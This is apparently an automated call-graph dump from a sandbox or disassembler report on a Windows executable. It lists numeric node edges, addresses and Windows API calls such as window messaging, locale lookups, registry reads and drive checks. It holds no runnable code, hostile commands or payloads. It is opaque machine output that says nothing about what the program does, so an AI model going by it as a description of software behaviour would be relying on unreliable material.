53712->53767 53713->53714 53724 4240b7 53713->53724 53714->53689 53725 423e16 PostMessageA 53715->53725 53726 423c9f 53715->53726 53829 423b7c NtdllDefWindowProc_A 53716->53829 53722 4240e5 53717->53722 53717->53739 53847 424848 WinHelpA PostMessageA 53718->53847 53817 4241d4 IsIconic 53719->53817 53825 423b7c NtdllDefWindowProc_A 53720->53825 53734 424103 53722->53734 53735 4240ee 53722->53735 53846 41efec GetCurrentThreadId 73A25940 53724->53846 53835 423b7c NtdllDefWindowProc_A 53725->53835 53731 423ca8 53726->53731 53732 423e9d 53726->53732 53742 423cb1 53731->53742 53743 423dc6 IsIconic 53731->53743 53744 423ea6 53732->53744 53745 423ed7 53732->53745 53733 423e31 53733->53714 53854 424524 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 53734->53854 53848 4244cc 53735->53848 53736->53739 53748 423e03 53736->53748 53805 423b7c NtdllDefWindowProc_A 53737->53805 53739->53714 53815 423b7c NtdllDefWindowProc_A 53739->53815 53741 4240be 53741->53714 53755 4240c6 SetFocus 53741->53755 53742->53739 53756 423d89 53742->53756 53749 423de2 53743->53749 53750 423dd6 53743->53750 53757 423b0c 5 API calls 53744->53757 53812 423b7c NtdllDefWindowProc_A 53745->53812 53747->53714 53758 423fcf IsWindowEnabled 53747->53758 53830 424170 53748->53830 53828 423b7c NtdllDefWindowProc_A 53749->53828 53827 423bb8 15 API calls 53750->53827 53754 423e3d 53762 423e7b 53754->53762 53763 423e59 53754->53763 53755->53714 53756->53714 53826 422c44 ShowWindow PostMessageA PostQuitMessage 53756->53826 53764 423eae 53757->53764 53758->53714 53765 423fdd 53758->53765 53761 423edd 53766 423ef5 53761->53766 53813 41ee9c GetCurrentThreadId 73A25940 53761->53813 53769 423a7c 6 API calls 53762->53769 53806 423b0c 53763->53806 53771 423ec0 53764->53771 53836 41ef50 53764->53836 53779 423fe4 IsWindowVisible 53765->53779 53774 423a7c 6 API calls 53766->53774 53767->53714 53775 423f70 IsWindowEnabled 53767->53775 53777 423e83 PostMessageA 53769->53777 53842 423b7c NtdllDefWindowProc_A 53771->53842 53774->53714 53775->53714 53780 423f7e 53775->53780 53777->53714 53779->53714 53781 423ff2 GetFocus 53779->53781 53843 412308 7 API calls 53780->53843 53783 4181d8 53781->53783 53784 424007 SetFocus 53783->53784 53844 415238 53784->53844 53788 423b05 53787->53788 53789 423a8c 53787->53789 53788->53689 53789->53788 53790 423a92 EnumWindows 53789->53790 53790->53788 53791 423aae GetWindow GetWindowLongA 53790->53791 53946 423a14 GetWindow 53790->53946 53792 423acd 53791->53792 53792->53788 53793 423af9 SetWindowPos 53792->53793 53793->53788 53793->53792 53795 415275 53794->53795 53796 4152d0 53795->53796 53797 4152db 53795->53797 53800 4152d9 53795->53800 53796->53800 53950 415054 46 API calls 53796->53950 53949 424b84 13 API calls 53797->53949 53800->53689 53802 423b75 53801->53802 53803 423b6a 53801->53803 53802->53696 53802->53697 53803->53802 53855 408710 GetSystemDefaultLCID 53803->53855 53805->53754 53807 423b5a PostMessageA 53806->53807 53809 423b1b 53806->53809 53807->53714 53808 423b52 53918 40b3c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53808->53918 53809->53807 53809->53808 53811 423b46 SetWindowPos 53809->53811 53811->53808 53811->53809 53812->53761 53814 41ef21 53813->53814 53814->53766 53815->53714 53816->53714 53818 42421b 53817->53818 53819 4241e5 SetActiveWindow 53817->53819 53818->53714 53919 423644 53819->53919 53822 423b0c 5 API calls 53823 424202 53822->53823 53823->53818 53824 424215 SetFocus 53823->53824 53824->53818 53825->53714 53826->53714 53827->53714 53828->53714 53829->53714 53931 41db28 53830->53931 53833 424188 53833->53714 53834 42417c LoadIconA 53834->53833 53835->53733 53837 41ef84 53836->53837 53838 41ef58 IsWindow 53836->53838 53837->53771 53839 41ef67 EnableWindow 53838->53839 53841 41ef72 53838->53841 53839->53841 53840 402660 4 API calls 53840->53841 53841->53837 53841->53838 53841->53840 53842->53714 53843->53714 53845 415253 SetFocus 53844->53845 53845->53714 53846->53741 53847->53733 53849 4244f2 53848->53849 53850 4244d8 53848->53850 53853 402648 4 API calls 53849->53853 53851 424507 53850->53851 53852 4244df SendMessageA 53850->53852 53851->53714 53852->53851 53853->53851 53854->53733 53910 408558 GetLocaleInfoA 53855->53910 53858 403450 4 API calls 53859 408750 53858->53859 53860 408558 5 API calls 53859->53860 53861 408765 53860->53861 53862 408558 5 API calls 53861->53862 53863 408789 53862->53863 53916 4085a4 GetLocaleInfoA 53863->53916 53866 4085a4 GetLocaleInfoA 53867 4087b9 53866->53867 53868 408558 5 API calls 53867->53868 53869 4087d3 53868->53869 53870 4085a4 GetLocaleInfoA 53869->53870 53871 4087f0 53870->53871 53872 408558 5 API calls 53871->53872 53873 40880a 53872->53873 53874 403450 4 API calls 53873->53874 53875 408817 53874->53875 53876 408558 5 API calls 53875->53876 53877 40882c 53876->53877 53878 403450 4 API calls 53877->53878 53879 408839 53878->53879 53880 4085a4 GetLocaleInfoA 53879->53880 53881 408847 53880->53881 53882 408558 5 API calls 53881->53882 53883 408861 53882->53883 53884 403450 4 API calls 53883->53884 53885 40886e 53884->53885 53886 408558 5 API calls 53885->53886 53887 408883 53886->53887 53888 403450 4 API calls 53887->53888 53889 408890 53888->53889 53890 408558 5 API calls 53889->53890 53891 4088a5 53890->53891 53892 4088c2 53891->53892 53893 4088b3 53891->53893 53895 403494 4 API calls 53892->53895 53894 403494 4 API calls 53893->53894 53896 4088c0 53894->53896 53895->53896 53897 408558 5 API calls 53896->53897 53898 4088e4 53897->53898 53899 408901 53898->53899 53900 4088f2 53898->53900 53902 403400 4 API calls 53899->53902 53901 403494 4 API calls 53900->53901 53911 408591 53910->53911 53912 40857f 53910->53912 53914 403494 4 API calls 53911->53914 53913 4034e0 4 API calls 53912->53913 53915 40858f 53913->53915 53914->53915 53915->53858 53917 4085c0 53916->53917 53917->53866 53918->53807 53927 4235f0 SystemParametersInfoA 53919->53927 53922 42365d ShowWindow 53924 423668 53922->53924 53925 42366f 53922->53925 53930 423620 SystemParametersInfoA 53924->53930 53925->53822 53928 42360e 53927->53928 53928->53922 53929 423620 SystemParametersInfoA 53928->53929 53929->53922 53930->53925 53934 41db4c 53931->53934 53935 41db32 53934->53935 53936 41db59 53934->53936 53935->53833 53935->53834 53936->53935 53943 40cc68 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53936->53943 53938 41db76 53938->53935 53939 41db90 53938->53939 53940 41db83 53938->53940 53944 41bd84 11 API calls 53939->53944 53945 41b380 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53940->53945 53943->53938 53944->53935 53945->53935 53947 423a35 GetWindowLongA 53946->53947 53948 423a41 53946->53948 53947->53948 53949->53800 53950->53800 53951 46b930 53952 46b964 53951->53952 53985 46bdcd 53951->53985 53953 46b9a0 53952->53953 53956 46b9fc 53952->53956 53957 46b9da 53952->53957 53958 46b9eb 53952->53958 53959 46b9b8 53952->53959 53960 46b9c9 53952->53960 53953->53985 54042 468a9c 53953->54042 53954 403400 4 API calls 53955 46be0c 53954->53955 53962 403400 4 API calls 53955->53962 54274 46b8c0 45 API calls 53956->54274 54007 46b4f0 53957->54007 54273 46b6b0 67 API calls 53958->54273 54271 46b240 47 API calls 53959->54271 54272 46b3a8 42 API calls 53960->54272 53968 46be14 53962->53968 53969 46b9be 53969->53953 53969->53985 53970 46ba38 53971 4942ac 18 API calls 53970->53971 53981 46ba7b 53970->53981 53970->53985 53971->53981 53973 414ae0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53973->53981 53974 46bb9e 54275 482b48 123 API calls 53974->54275 53977 42cbb8 6 API calls 53977->53981 53978 46bbb9 53978->53985 53979 46bbf7 54060 469d44 53979->54060 53980 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53980->53981 53981->53973 53981->53974 53981->53977 53981->53979 53981->53980 53982 46ad88 23 API calls 53981->53982 53981->53985 54003 46bcbf 53981->54003 54045 4689d8 53981->54045 54053 46aaf4 53981->54053 54198 482648 53981->54198 54284 46affc 19 API calls 53981->54284 53982->53981 53985->53954 53986 46ad88 23 API calls 53986->53985 53988 46bc5d 53989 403450 4 API calls 53988->53989 53990 46bc6d 53989->53990 53991 46bcc9 53990->53991 53992 46bc79 53990->53992 53997 46bd8b 53991->53997 54121 46ad88 53991->54121 53993 457d3c 24 API calls 53992->53993 53994 46bc98 53993->53994 53996 457d3c 24 API calls 53994->53996 53996->54003 53998 46bce3 54003->53986 54285 46c244 54007->54285 54010 46b672 54011 403420 4 API calls 54010->54011 54013 46b68c 54011->54013 54012 414ae0 4 API calls 54014 46b53e 54012->54014 54016 403400 4 API calls 54013->54016 54015 46b65e 54014->54015 54288 455f58 13 API calls 54014->54288 54015->54010 54018 403450 4 API calls 54015->54018 54019 46b694 54016->54019 54018->54010 54020 403400 4 API calls 54019->54020 54021 46b69c 54020->54021 54021->53953 54022 46b621 54022->54010 54022->54015 54028 42cd40 7 API calls 54022->54028 54023 42cd40 7 API calls 54025 46b5fa 54023->54025 54024 46b5c1 54024->54010 54024->54022 54024->54023 54025->54022 54029 45142c 4 API calls 54025->54029 54026 46b55c 54026->54024 54289 466428 54026->54289 54031 46b637 54028->54031 54032 46b611 54029->54032 54031->54015 54034 45142c 4 API calls 54031->54034 54294 47e618 42 API calls 54032->54294 54033 466428 19 API calls 54036 46b59c 54033->54036 54037 46b64e 54034->54037 54038 4513fc 4 API calls 54036->54038 54295 47e618 42 API calls 54037->54295 54040 46b5b1 54038->54040 54293 47e618 42 API calls 54040->54293 54043 4689d8 19 API calls 54042->54043 54044 468aab 54043->54044 54044->53970 54048 468a07 54045->54048 54046 4078e4 19 API calls 54047 468a40 54046->54047 54415 453318 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54047->54415 54048->54046 54050 468a48 54048->54050 54051 403400 4 API calls 54050->54051 54052 468a60 54051->54052 54052->53981 54054 46ab05 54053->54054 54055 46ab00 54053->54055 54501 4698a8 46 API calls 54054->54501 54059 46ab03 54055->54059 54416 46a560 54055->54416 54057 46ab0d 54057->53981 54059->53981 54061 403400 4 API calls 54060->54061 54062 469d72 54061->54062 54524 47d4e4 54062->54524 54064 469dd5 54065 469df2 54064->54065 54066 469dd9 54064->54066 54068 469de3 54065->54068 54534 49419c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54065->54534 54531 466628 54066->54531 54071 469f11 54068->54071 54072 469f7c 54068->54072 54120 46a086 54068->54120 54070 469e0e 54070->54068 54074 469e16 54070->54074 54075 403494 4 API calls 54071->54075 54076 403494 4 API calls 54072->54076 54073 403420 4 API calls 54077 46a0b0 54073->54077 54078 46ad88 23 API calls 54074->54078 54079 469f1e 54075->54079 54080 469f89 54076->54080 54077->53988 54081 469e23 54078->54081 54082 40357c 4 API calls 54079->54082 54083 40357c 4 API calls 54080->54083 54093 469e64 54081->54093 54094 469e4c SetActiveWindow 54081->54094 54084 469f2b 54082->54084 54085 469f96 54083->54085 54086 40357c 4 API calls 54084->54086 54087 40357c 4 API calls 54085->54087 54088 469f38 54086->54088 54089 469fa3 54087->54089 54090 40357c 4 API calls 54088->54090 54091 40357c 4 API calls 54089->54091 54095 469f45 54090->54095 54092 469fb0 54091->54092 54097 40357c 4 API calls 54092->54097 54535 42f558 54093->54535 54094->54093 54096 466628 20 API calls 54095->54096 54098 469f53 54096->54098 54099 469fbe 54097->54099 54100 40357c 4 API calls 54098->54100 54101 414b10 4 API calls 54099->54101 54103 469f5c 54100->54103 54104 469f7a 54101->54104 54106 40357c 4 API calls 54103->54106 54552 466960 54104->54552 54110 469f69 54106->54110 54109 469eb5 54112 46ac04 21 API calls 54109->54112 54111 414b10 4 API calls 54110->54111 54111->54104 54113 469ee7 54112->54113 54113->53988 54114 469fe0 54115 414b10 4 API calls 54114->54115 54114->54120 54116 46a043 54115->54116 54555 49505c MulDiv 54116->54555 54118 46a060 54119 414b10 4 API calls 54118->54119 54119->54120 54120->54073 54122 468a9c 19 API calls 54121->54122 54123 46ada0 54122->54123 54124 46adc2 54123->54124 54125 4650f4 7 API calls 54123->54125 54641 4650f4 54124->54641 54125->54124 54129 46adda 54130 46ac04 21 API calls 54129->54130 54131 46ae12 54130->54131 54132 414b10 4 API calls 54131->54132 54133 46ae26 54132->54133 54134 46ae32 54133->54134 54135 46ae5c 54133->54135 54136 414b10 4 API calls 54134->54136 54138 46ae7b 54135->54138 54139 46aea5 54135->54139 54137 46ae46 54136->54137 54141 414b10 4 API calls 54137->54141 54142 414b10 4 API calls 54138->54142 54140 414b10 4 API calls 54139->54140 54143 46aeb9 54140->54143 54144 46ae5a 54141->54144 54145 46ae8f 54142->54145 54146 414b10 4 API calls 54143->54146 54658 46ab1c 54144->54658 54147 414b10 4 API calls 54145->54147 54146->54144 54147->54144 54151 468a9c 19 API calls 54153 46af57 54151->54153 54152 46aef7 54152->54151 54154 46afba 54153->54154 54663 4941f8 18 API calls 54153->54663 54154->53998 54199 46c244 48 API calls 54198->54199 54200 48268b 54199->54200 54201 482694 54200->54201 54900 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54200->54900 54203 414ae0 4 API calls 54201->54203 54204 4826a4 54203->54204 54205 403450 4 API calls 54204->54205 54206 4826b1 54205->54206 54710 46c59c 54206->54710 54209 4826c1 54211 414ae0 4 API calls 54209->54211 54212 4826d1 54211->54212 54213 403450 4 API calls 54212->54213 54214 4826de 54213->54214 54215 469690 SendMessageA 54214->54215 54216 4826f7 54215->54216 54217 482748 54216->54217 54902 4797dc 23 API calls 54216->54902 54219 4241d4 11 API calls 54217->54219 54220 482752 54219->54220 54221 482778 54220->54221 54222 482763 SetActiveWindow 54220->54222 54739 481a78 54221->54739 54222->54221 54271->53969 54272->53953 54273->53953 54274->53953 54275->53978 54284->53981 54296 46c2dc 54285->54296 54288->54026 54290 466442 54289->54290 54291 4078e4 19 API calls 54290->54291 54292 46647d 54291->54292 54292->54033 54293->54024 54294->54022 54295->54015 54297 414ae0 4 API calls 54296->54297 54298 46c310 54297->54298 54357 4666c0 54298->54357 54302 46c322 54303 46c331 54302->54303 54307 46c34a 54302->54307 54391 47e618 42 API calls 54303->54391 54305 403420 4 API calls 54306 46b522 54305->54306 54306->54010 54306->54012 54308 46c391 54307->54308 54309 46c378 54307->54309 54310 46c3f6 54308->54310 54315 46c395 54308->54315 54392 47e618 42 API calls 54309->54392 54394 42cb44 CharNextA 54310->54394 54313 46c405 54314 46c409 54313->54314 54319 46c422 54313->54319 54395 47e618 42 API calls 54314->54395 54317 46c3dd 54315->54317 54315->54319 54393 47e618 42 API calls 54317->54393 54318 46c446 54396 47e618 42 API calls 54318->54396 54319->54318 54371 466830 54319->54371 54324 46c345 54324->54305 54327 46c45f 54328 403778 4 API calls 54327->54328 54329 46c475 54328->54329 54379 42c994 54329->54379 54332 46c486 54397 4668bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54332->54397 54333 46c4b7 54335 42c8c4 5 API calls 54333->54335 54337 46c4c2 54335->54337 54336 46c499 54338 45142c 4 API calls 54336->54338 54339 42c3f4 5 API calls 54337->54339 54340 46c4a6 54338->54340 54341 46c4cd 54339->54341 54398 47e618 42 API calls 54340->54398 54343 42cbb8 6 API calls 54341->54343 54344 46c4d8 54343->54344 54383 46c270 54344->54383 54346 46c4e0 54347 42cd40 7 API calls 54346->54347 54348 46c4e8 54347->54348 54349 46c502 54348->54349 54350 46c4ec 54348->54350 54349->54324 54352 46c50c 54349->54352 54399 47e618 42 API calls 54350->54399 54353 46c514 GetDriveTypeA 54352->54353 54353->54324 54354 46c51f 54353->54354 54400 47e618 42 API calls 54354->54400 54356 46c533 54356->54324 54358 4666da 54357->54358 54360 42cbb8 6 API calls 54358->54360 54361 403450 4 API calls 54358->54361 54362 406ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54358->54362 54363 466723 54358->54363 54401 42caa4 54358->54401 54360->54358 54361->54358 54362->54358 54364 403420 4 API calls 54363->54364 54365 46673d 54364->54365 54366 414b10 54365->54366 54367 414ae0 4 API calls 54366->54367 54368 414b34 54367->54368 54369 403400 4 API calls 54368->54369 54370 414b65 54369->54370 54370->54302 54372 46683a 54371->54372 54373 46684d 54372->54373 54412 42cb34 CharNextA 54372->54412 54373->54318 54375 466860 54373->54375 54377 46686a 54375->54377 54376 466897 54376->54318 54376->54327 54377->54376 54413 42cb34 CharNextA 54377->54413 54380 42c9ed 54379->54380 54381 42c9aa 54379->54381 54380->54332 54380->54333 54381->54380 54414 42cb34 CharNextA 54381->54414 54384 46c2d5 54383->54384 54385 46c283 54383->54385 54384->54346 54385->54384 54386 41ee9c 2 API calls 54385->54386 54387 46c293 54386->54387 54388 46c2ad SHPathPrepareForWriteA 54387->54388 54389 41ef50 6 API calls 54388->54389 54390 46c2cd 54389->54390 54390->54346 54391->54324 54392->54324 54393->54324 54394->54313 54395->54324 54396->54324 54397->54336 54398->54324 54399->54324 54400->54356 54402 403494 4 API calls 54401->54402 54403 42cab4 54402->54403 54404 403744 4 API calls 54403->54404 54407 42caea 54403->54407 54410 42c43c IsDBCSLeadByte 54403->54410 54404->54403 54406 42cb2e 54406->54358 54407->54406 54409 4037b8 4 API calls 54407->54409 54411 42c43c IsDBCSLeadByte 54407->54411 54409->54407 54410->54403 54411->54407 54412->54372 54413->54377 54414->54381 54415->54050 54418 46a5a7 54416->54418 54417 46aa1f 54420 46aa3a 54417->54420 54421 46aa6b 54417->54421 54418->54417 54419 46a662 54418->54419 54423 403494 4 API calls 54418->54423 54422 46a683 54419->54422 54427 46a6c4 54419->54427 54424 403494 4 API calls 54420->54424 54425 403494 4 API calls 54421->54425 54428 403494 4 API calls 54422->54428 54429 46a5e6 54423->54429 54430 46aa48 54424->54430 54426 46aa79 54425->54426 54520 468f84 12 API calls 54426->54520 54435 403400 4 API calls 54427->54435 54432 46a691 54428->54432 54433 414ae0 4 API calls 54429->54433 54519 468f84 12 API calls 54430->54519 54436 414ae0 4 API calls 54432->54436 54437 46a607 54433->54437 54450 46a6c2 54435->54450 54439 46a6b2 54436->54439 54440 403634 4 API calls 54437->54440 54438 403400 4 API calls 54443 46aa9c 54438->54443 54445 403634 4 API calls 54439->54445 54446 46a617 54440->54446 54441 46aa56 54441->54438 54449 403400 4 API calls 54443->54449 54444 46a830 54447 403400 4 API calls 54444->54447 54445->54450 54451 414ae0 4 API calls 54446->54451 54452 46a82e 54447->54452 54448 46a6e4 54453 46a722 54448->54453 54454 46a6ea 54448->54454 54455 46aaa4 54449->54455 54496 46a7a8 54450->54496 54502 469690 54450->54502 54456 46a62b 54451->54456 54514 469acc 43 API calls 54452->54514 54459 403400 4 API calls 54453->54459 54457 403494 4 API calls 54454->54457 54458 403420 4 API calls 54455->54458 54456->54419 54460 414ae0 4 API calls 54456->54460 54461 46a6f8 54457->54461 54462 46aab1 54458->54462 54464 46a720 54459->54464 54465 46a652 54460->54465 54467 47bb50 43 API calls 54461->54467 54462->54059 54463 46a7ef 54468 403494 4 API calls 54463->54468 54508 469984 54464->54508 54469 403634 4 API calls 54465->54469 54471 46a710 54467->54471 54472 46a7fd 54468->54472 54469->54419 54470 46a859 54478 46a864 54470->54478 54479 46a8ba 54470->54479 54474 403634 4 API calls 54471->54474 54475 414ae0 4 API calls 54472->54475 54474->54464 54477 46a81e 54475->54477 54476 46a749 54483 46a754 54476->54483 54484 46a7aa 54476->54484 54480 403634 4 API calls 54477->54480 54482 403494 4 API calls 54478->54482 54481 403400 4 API calls 54479->54481 54480->54452 54487 46a8c2 54481->54487 54488 46a872 54482->54488 54486 403494 4 API calls 54483->54486 54485 403400 4 API calls 54484->54485 54485->54496 54491 46a762 54486->54491 54500 46a96b 54487->54500 54515 49419c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54487->54515 54488->54487 54492 403634 4 API calls 54488->54492 54494 46a8b8 54488->54494 54490 46a8e5 54490->54500 54516 494448 18 API calls 54490->54516 54495 403634 4 API calls 54491->54495 54491->54496 54492->54488 54494->54487 54495->54491 54496->54444 54496->54463 54498 46aa0c 54518 42913c SendMessageA SendMessageA 54498->54518 54517 4290ec SendMessageA 54500->54517 54501->54057 54521 42a038 SendMessageA 54502->54521 54504 46969f 54505 4696bf 54504->54505 54522 42a038 SendMessageA 54504->54522 54505->54448 54507 4696af 54507->54448 54512 4699b1 54508->54512 54509 469a13 54510 403400 4 API calls 54509->54510 54511 469a28 54510->54511 54511->54476 54512->54509 54523 469908 43 API calls 54512->54523 54514->54470 54515->54490 54516->54500 54517->54498 54518->54417 54519->54441 54520->54441 54521->54504 54522->54507 54523->54512 54525 47d4fd 54524->54525 54529 47d53a 54524->54529 54556 455ce0 54525->54556 54529->54064 54530 47d551 54530->54064 54611 46653c 54531->54611 54534->54070 54536 42f564 54535->54536 54537 42f587 GetActiveWindow GetFocus 54536->54537 54538 41ee9c 2 API calls 54537->54538 54539 42f59e 54538->54539 54540 42f5bb 54539->54540 54541 42f5ab RegisterClassA 54539->54541 54542 42f64a SetFocus 54540->54542 54543 42f5c9 CreateWindowExA 54540->54543 54541->54540 54545 403400 4 API calls 54542->54545 54543->54542 54544 42f5fc 54543->54544 54632 424274 54544->54632 54547 42f666 54545->54547 54551 494448 18 API calls 54547->54551 54548 42f624 54549 42f62c CreateWindowExA 54548->54549 54549->54542 54550 42f642 ShowWindow 54549->54550 54550->54542 54551->54109 54638 44b50c 54552->54638 54554 466967 54554->54114 54555->54118 54557 455cf1 54556->54557 54558 455cf5 54557->54558 54559 455cfe 54557->54559 54582 4559e4 54558->54582 54590 455ac4 29 API calls 54559->54590 54562 455cfb 54562->54529 54563 47d154 54562->54563 54565 47d250 54563->54565 54566 47d194 54563->54566 54564 403420 4 API calls 54567 47d333 54564->54567 54568 4790c4 19 API calls 54565->54568 54572 47d2a1 54565->54572 54578 47d1f3 54565->54578 54566->54565 54570 479368 4 API calls 54566->54570 54575 47bb50 43 API calls 54566->54575 54566->54578 54580 47d1fc 54566->54580 54599 479204 54566->54599 54567->54530 54568->54565 54570->54566 54571 47bb50 43 API calls 54571->54572 54572->54565 54572->54571 54574 4540d4 20 API calls 54572->54574 54577 47d23d 54572->54577 54573 47bb50 43 API calls 54573->54580 54574->54572 54575->54566 54576 42c924 5 API calls 54576->54580 54577->54578 54578->54564 54579 42c94c 5 API calls 54579->54580 54580->54566 54580->54573 54580->54576 54580->54577 54580->54579 54610 47ce60 52 API calls 54580->54610 54583 42de14 RegOpenKeyExA 54582->54583 54584 455a01 54583->54584 54585 455a4f 54584->54585 54591 455918 54584->54591 54585->54562 54588 455918 6 API calls 54589 455a30 RegCloseKey 54588->54589 54589->54562 54590->54562 54596 42dd50 54591->54596 54593 455940 54594 403420 4 API calls 54593->54594 54595 4559ca 54594->54595 54595->54588 54597 42dbf8 6 API calls 54596->54597 54598 42dd59 54597->54598 54598->54593 54600 479216 54599->54600 54601 47921a 54599->54601 54600->54566 54602 403450 4 API calls 54601->54602 54603 479227 54602->54603 54604 479247 54603->54604 54605 47922d 54603->54605 54607 4790c4 19 API calls 54604->54607 54606 4790c4 19 API calls 54605->54606 54608 479243 54606->54608 54607->54608 54609 403400 4 API calls 54608->54609 54609->54600 54610->54580 54612 403494 4 API calls 54611->54612 54613 46656a 54612->54613 54614 42dbc0 5 API calls 54613->54614 54615 46657c 54614->54615 54616 42dbc0 5 API calls 54615->54616 54617 46658e 54616->54617 54618 466428 19 API calls 54617->54618 54619 466598 54618->54619 54620 42dbc0 5 API calls 54619->54620 54621 4665a7 54620->54621 54628 4664a0 54621->54628 54624 42dbc0 5 API calls 54625 4665c0 54624->54625 54626 403400 4 API calls 54625->54626 54627 4665d5 54626->54627 54627->54068 54629 4664c0 54628->54629 54630 4078e4 19 API calls 54629->54630 54631 46650a 54630->54631 54631->54624 54633 4242a6 54632->54633 54634 424286 GetWindowTextA 54632->54634 54636 403494 4 API calls 54633->54636 54635 4034e0 4 API calls 54634->54635 54637 4242a4 54635->54637 54636->54637 54637->54548 54639 44b384 11 API calls 54638->54639 54640 44b51f 54639->54640 54640->54554 54643 4650ff 54641->54643 54642 4651da 54652 466eb4 54642->54652 54643->54642 54647 46514f 54643->54647 54664 421a14 54643->54664 54644 465192 54644->54642 54670 4185b0 7 API calls 54644->54670 54647->54644 54648 465194 54647->54648 54649 465189 54647->54649 54651 421a14 7 API calls 54648->54651 54650 421a14 7 API calls 54649->54650 54650->54644 54651->54644 54653 466ee4 54652->54653 54654 466ec5 54652->54654 54653->54129 54655 414b10 4 API calls 54654->54655 54656 466ed3 54655->54656 54657 414b10 4 API calls 54656->54657 54657->54653 54659 46ab29 54658->54659 54660 421a14 7 API calls 54659->54660 54661 46abb4 54660->54661 54661->54152 54662 466988 18 API calls 54661->54662 54662->54152 54663->54154 54665 421a6c 54664->54665 54668 421a22 54664->54668 54665->54647 54666 421a51 54666->54665 54671 421d20 SetFocus GetFocus 54666->54671 54668->54666 54669 408cac 5 API calls 54668->54669 54669->54666 54670->54642 54671->54665 54711 46c5c5 54710->54711 54712 46c612 54711->54712 54713 414ae0 4 API calls 54711->54713 54715 403420 4 API calls 54712->54715 54714 46c5db 54713->54714 54909 46674c 6 API calls 54714->54909 54717 46c6bc 54715->54717 54717->54209 54901 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54717->54901 54718 46c5e3 54719 414b10 4 API calls 54718->54719 54720 46c5f1 54719->54720 54721 46c5fe 54720->54721 54723 46c617 54720->54723 54910 47e618 42 API calls 54721->54910 54724 46c62f 54723->54724 54725 466830 CharNextA 54723->54725 54911 47e618 42 API calls 54724->54911 54727 46c62b 54725->54727 54727->54724 54728 46c645 54727->54728 54729 46c661 54728->54729 54730 46c64b 54728->54730 54732 42c994 CharNextA 54729->54732 54912 47e618 42 API calls 54730->54912 54733 46c66e 54732->54733 54733->54712 54913 4668bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54733->54913 54735 46c685 54736 45142c 4 API calls 54735->54736 54737 46c692 54736->54737 54914 47e618 42 API calls 54737->54914 54740 481ac9 54739->54740 54741 481a9b 54739->54741 54743 475934 54740->54743 54915 4941f8 18 API calls 54741->54915 54744 457b30 24 API calls 54743->54744 54745 475980 54744->54745 54746 407298 SetCurrentDirectoryA 54745->54746 54747 47598a 54746->54747 54916 46e128 54747->54916 54751 47599a 54924 459f68 54751->54924 54902->54217 54909->54718 54910->54712 54911->54712 54912->54712 54913->54735 54914->54712 54915->54740 54917 46e19b 54916->54917 54919 46e145 54916->54919 54920 46e1a0 54917->54920 54918 479204 19 API calls 54918->54919 54919->54917 54919->54918 54921 46e1c6 54920->54921 55364 44faf0 54921->55364 54923 46e222 54923->54751 54925 459f6e 54924->54925 54926 45a250 4 API calls 54925->54926 55367 44fb04 55364->55367 55368 44fb15 55367->55368 55369 44fb01 55368->55369 55370 44fb3f MulDiv 55368->55370 55369->54923 55371 4181d8 55370->55371 55372 44fb6a SendMessageA 55371->55372 55372->55369 53366 42f518 53367 42f523 53366->53367 53368 42f527 NtdllDefWindowProc_A 53366->53368 53368->53367 53369 4358d8 53370 4358ed 53369->53370 53374 435907 53370->53374 53375 4352c0 53370->53375 53379 4352f0 53375->53379 53385 43530a 53375->53385 53376 403400 4 API calls 53377 43570f 53376->53377 53377->53374 53388 435720 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53377->53388 53378 446d9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53378->53379 53379->53378 53380 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53379->53380 53381 402648 4 API calls 53379->53381 53382 431c98 4 API calls 53379->53382 53383 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53379->53383 53379->53385 53386 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53379->53386 53389 4343a8 53379->53389 53401 434b6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53379->53401 53380->53379 53381->53379 53382->53379 53383->53379 53385->53376 53386->53379 53388->53374 53390 434465 53389->53390 53391 4343d5 53389->53391 53420 434308 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53390->53420 53393 403494 4 API calls 53391->53393 53394 4343e3 53393->53394 53395 403778 4 API calls 53394->53395 53399 434404 53395->53399 53396 403400 4 API calls 53397 4344b5 53396->53397 53397->53379 53398 434457 53398->53396 53399->53398 53402 493e50 53399->53402 53401->53379 53403 493e88 53402->53403 53404 493f20 53402->53404 53405 403494 4 API calls 53403->53405 53421 448928 53404->53421 53409 493e93 53405->53409 53407 403400 4 API calls 53408 493f44 53407->53408 53410 403400 4 API calls 53408->53410 53411 4037b8 4 API calls 53409->53411 53413 493ea3 53409->53413 53412 493f4c 53410->53412 53414 493ebc 53411->53414 53412->53399 53413->53407 53414->53413 53415 4037b8 4 API calls 53414->53415 53416 493edf 53415->53416 53417 403778 4 API calls 53416->53417 53418 493f10 53417->53418 53419 403634 4 API calls 53418->53419 53419->53404 53420->53398 53422 44894d 53421->53422 53423 448990 53421->53423 53424 403494 4 API calls 53422->53424 53426 4489a4 53423->53426 53433 448524 53423->53433 53425 448958 53424->53425 53430 4037b8 4 API calls 53425->53430 53428 403400 4 API calls 53426->53428 53429 4489d7 53428->53429 53429->53413 53431 448974 53430->53431 53432 4037b8 4 API calls 53431->53432 53432->53423 53434 403494 4 API calls 53433->53434 53435 44855a 53434->53435 53436 4037b8 4 API calls 53435->53436 53437 44856c 53436->53437 53438 403778 4 API calls 53437->53438 53439 44858d 53438->53439 53440 4037b8 4 API calls 53439->53440 53441 4485a5 53440->53441 53442 403778 4 API calls 53441->53442 53443 4485d0 53442->53443 53444 4037b8 4 API calls 53443->53444 53455 4485e8 